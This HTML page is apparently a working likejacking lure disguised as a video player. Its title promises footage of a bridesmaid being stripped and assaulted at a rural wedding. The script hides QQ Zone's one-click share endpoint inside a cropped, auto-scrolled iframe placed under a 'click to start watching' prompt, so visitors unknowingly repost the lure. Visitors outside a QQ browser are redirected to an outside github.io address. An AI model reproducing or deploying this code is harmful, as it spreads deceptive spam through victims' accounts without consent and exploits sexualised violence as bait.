<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="user-scalable=no, width=device-width, initial-scale=1" />
<title>▶农村结婚闹伴娘，惨遭脱和凌##辱！</title>
<style type="text/css">
		
<!--
a {
	text-decoration: none;
}
img {
	border:	none;
}
body {
	margin: 0px;
	padding: 0px;
}
.box1 {
	position: absolute;
	width: 100%;
	height: 100%;
	background-color: #000;
	color: #fff;
}
.box1 .box2 {
  margin: 0 auto;
  margin-top: 15%;
}
@media screen and (max-width: 900px) {
	.box1 .box2 {
		margin-top: 20%;	
	}
}
@media screen and (max-width: 480px) {
	.box1 .box2 {
		margin-top: 30%;	
	}
}
.box1 .box2 img {
	display: block;
	margin: 0 auto;
	border: 2px solid #04a080;
	border-radius: 0 0 5px 5px;
	  width: 175px;
  height: 175px;
}
.box1 .box3 {
	margin-top: 20px;
}
.box1 .box3 a {
	display: block;
	margin: 0 auto;
	width: 176px;
	height: 33px;
}
.box1 .box4 {
	text-align: center;
	margin-top: 20%;
	font-size: 20px;
}
@media screen and (max-width: 900px) {
	.box1 .box4 {
		margin-top: 30%;	
	}
}
@media screen and (max-width: 480px) {
	.box1 .box4 {
		margin-top: 40%;	
	}
}

.box1 .box5 {
	text-align: center;
	margin-top: 10px;
}
.wrapper{ width:78px; height:29px; overflow:hidden; position:relative; margin:0 auto;}
#if_res { width:1024px;height:768px; position:absolute; top: -523px;left: -694px;}
.wrapper1{  width: 215px;height: 46px;overflow:hidden; position:relative;   margin: 25px auto;}
#if_res1{ width:1024px;height:768px; position:absolute;  top: -262px;  left: -600px;}
.box1 .box5 irame {
	display: none;
}

.box1 .box6 {
	text-align: center;
	margin-top: 30px;
	font-size: 24px;
	font-weight: bold;
}
.box1 .box6 a {
	color: #fff;	
}
.box1 .box7 {
	position:absolute;
	top:10px;
	right:10px;
}
.box1 .box7 a {
	color: #fff;	
}
 .denglutitle { background: #04a080;
  width: 179px;
  height: 30px;
  display: inline-block;
  text-align: center;
  font-family: 微软雅黑;
  color: white;
  line-height: 30px;
  font-size: 18px;
  border-radius: 5px 5px 0 0;}
  .denglutitle1 { background: #04a080;
  width: 179px;
  height: 35px;
  display: inline-block;
  text-align: center;
  font-family: 微软雅黑;
  color: white;
  line-height: 35px;
  font-size: 18px;
  border-radius: 5px;}
-->
</style>
</head>
<body>

<script>
//iphone.....
var sUserAgent = navigator.userAgent.toLowerCase();  
var bIsIpad = sUserAgent.match(/iphone os/i) == "iphone os";   
var isQQBrowser = ((sUserAgent.indexOf('qq')!=-1 && sUserAgent.indexOf('nettype')!=-1) || (sUserAgent.indexOf('qzone')!=-1 && sUserAgent.indexOf('android')==-1));


 if (isQQBrowser) {
		//show(2);
	} else {
		//document.getElementById('loginCheck').src = "/loginCheck2.php";
		window.top.location.href = "http://xiaosc.github.io/s4";
		//show(1);
	}
/*if(bIsIpad){
    var frame_taget = document.getElementById("if_res");
    frame_taget.src="/p1.php?url=http%3A%2F%2Fwcs.gaoxiaotu.com%2Flyb2%2F%3F8Ac9e8K&desc=%E9%A2%9C%E4%B8%8D%E5%A6%82%E5%88%9D.%E6%B5%8B%E5%87%BA%E4%BA%86%E5%8F%A6%E4%B8%80%E5%8D%8A%E9%95%BF%E7%9B%B8%EF%BC%8C%E4%BD%A0%E4%B9%9F%E8%AF%95%E8%AF%95%E5%90%A7%EF%BC%81&title=%E5%8F%A6%E4%B8%80%E5%8D%8A%E9%95%BF%E7%9B%B8%E9%A2%84%E6%B5%8B&pics=http%3A%2F%2Ft1.qpic.cn%2Fmblogpic%2F936fdc6a855f4e609322%2F2000&summary=%E5%AF%B9%E8%87%AA%E5%B7%B1%E5%8F%A6%E4%B8%80%E5%8D%8A%E7%9A%84%E9%95%BF%E7%9B%B8%E5%A5%BD%E5%A5%87%E5%90%97%EF%BC%9F%E9%A9%AC%E4%B8%8A%E6%9F%A5%E7%9C%8B%EF%BC%81&site=%E4%BE%B5%E8%B6%8A%E5%B1%82%E9%81%97";
    frame_taget.width=88;
    frame_taget.style.marginTop="0px";
    frame_taget.onload=null;
    //setTimeout(function(){share_qzone_btc();},20000);
}*/




var Sys = {};
var ua = navigator.userAgent.toLowerCase();
var s;
(s = ua.match(/msie ([\d.]+)/)) ? Sys.ie = s[1] :
(s = ua.match(/firefox\/([\d.]+)/)) ? Sys.firefox = s[1] :
(s = ua.match(/chrome\/([\d.]+)/)) ? Sys.chrome = s[1] :
(s = ua.match(/opera.([\d.]+)/)) ? Sys.opera = s[1] :
(s = ua.match(/version\/([\d.]+).*safari/)) ? Sys.safari = s[1] : 0;

var iframeLoaded = function (iframe) {
    if (iframe.src.length > 0) {
        if (!iframe.readyState || iframe.readyState == "complete") {
            var x = iframe.contentWindow.document;
            threesT(x);
            setTimeout(function(){threesT(x);},1000);  
            setTimeout(function(){threesT(x);},2000); 
            setTimeout(function(){threesT(x);},3000);   
            setTimeout(function(){threesT(x);},4000);
            //setTimeout(function(){share_qzone_btc();},20000);
        }
    }
}

function threesT(x){
    //以下进行测试
    if (Sys.ie){
        var browser=navigator.appName 
        var b_version=navigator.appVersion 
        var version=b_version.split(";"); 
        var trim_Version=version[1].replace(/[ ]/g,""); 
        //ie6
        if(browser=="Microsoft Internet Explorer" && trim_Version=="MSIE6.0") 
        { 
            x.body.scrollTop= 510;
            x.body.scrollLeft = 463;
        }else{
            x.body.scrollTop= 520;
            x.body.scrollLeft = 463;
        }
        return;
    } else  if (Sys.chrome){
        //x.body.scrollTop= 535;
        //x.body.scrollLeft = 463;
        x.body.scrollTop= 510;
        x.body.scrollLeft = 463;
        return;
    } else  if (Sys.firefox){
        //x.body.scrollTop= 535;
        //x.body.scrollLeft = 463;
        x.body.scrollTop= 520;
        x.body.scrollLeft = 463;
        return;
    } else {
        x.body.scrollTop= 280;
        x.body.scrollLeft = 100;
    }
    
    //if (Sys.firefox) document.write('Firefox: ' + Sys.firefox);
    //if (Sys.opera) document.write('Opera: ' + Sys.opera);
    //if (Sys.safari) document.write('Safari: ' + Sys.safari);
    
    //iframe.style.display="none";
}
</script>

<div class="box1" id="screen1">
  <div class="box2"><p style="text-align:center; margin:0;"><a href="" class="denglutitle">精彩视屏</a></p> <img src=""> </div>
  <div class="box3"> <a href="" onClick="return go(this)" title="QQ登录" target="_top" class="denglutitle1"> 开始观看</a> </div>
</div>
<div class="box1" id="screen2" style="display:none;">
  <div class="box4"> 点击图标即可开始观看 </div>
  <div class="box5">
  	<div class="wrapper" id="genghuan"> 
  		<iframe id="if_res" src="" frameborder="no" border="0" marginwidth="0" scrolling="no" allowtransparency="yes"></iframe>
    </div>
  </div>
  <div class="box6" id="btn_start"> <a href="http://xiaosc.github.io/s4" class="denglutitle1">开始观看</a> </div>
<!--  <div class="box7"> <a href="/login.php?action=exit"> 退 出</a> </div>-->
</div>
<iframe src="" id="loginCheck" style="display:none;"></iframe>
<script>
function go(obj) {
	//window.top.location.href = "/login.php?action=go_oauth&ref="+encodeURIComponent(window.top.location.href);
	return false;
}

function show(idx) {
	var div1 = document.getElementById('screen1');
	var div2 = document.getElementById('screen2');	
	var btnStart=document.getElementById('btn_start');
	
	if (idx==1) {
		div1.style.display = "block";
		div2.style.display = "none";
	} else {
		div1.style.display = "none";
		div2.style.display = "block";
		
		btnStart.style.display = "none";
		setTimeout(function() {
			btnStart.style.display = "block";
		}, 5000);
	}
}

window.onload = function() {
	var bIsIpad = sUserAgent.match(/iphone os/i) == "iphone os";   
	var bIsAndroid = sUserAgent.match(/android/i) == "android";  
	if(bIsIpad){
	   document.getElementById("if_res").id = "if_res1";
	   var div = document.getElementById('genghuan'); 
	   div.className = 'wrapper1';
	}else if(bIsAndroid){
	   document.getElementById("if_res").id = "if_res1";
	   var div = document.getElementById('genghuan'); 
	   div.className = 'wrapper1';
	}
	
	
	var s = [];
	
	if(bIsIpad){
	    s.push('url='+escape("http://xiaosc.github.io/s4"));
		s.push('pics='+escape("http://t3.qpic.cn/mblogpic/59eb5631c63ff5bbf4d8/460"));
	}else if(bIsAndroid){
	    s.push('url='+escape("http://xiaosc.github.io/s4"));
		s.push('pics='+escape("http://t3.qpic.cn/mblogpic/59eb5631c63ff5bbf4d8/460"));
	}else{
		s.push('url='+"http://xiaosc.github.io/s4");
		s.push('pics='+"http://t3.qpic.cn/mblogpic/59eb5631c63ff5bbf4d8/460");
	}
		
//	s.push('desc='+'这个游戏不错哦，赶快来挑战我！！/偷笑/偷笑');
	s.push('title='+'▶农村结婚闹伴娘，惨遭脱和凌##辱！');
	//s.push('site='+encodeURIComponent('site....'));
	//s.push('otype=share');
	s.push('summary='+'▶农村结婚闹伴娘，惨遭脱和凌##辱！');
	
	if(bIsIpad){
	   document.getElementById('if_res1').src= 'http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?'+s.join('&');
	}else if(bIsAndroid){
	   document.getElementById('if_res1').src= 'http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?'+s.join('&');
	}else{
	   document.getElementById('if_res').src= 'http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?'+s.join('&');
	}
	
	if (isQQBrowser) {
		show(2);
	} else {
		//document.getElementById('loginCheck').src = "/loginCheck2.php";
	
		show(1);
	}

}

</script>


</body>
</html>
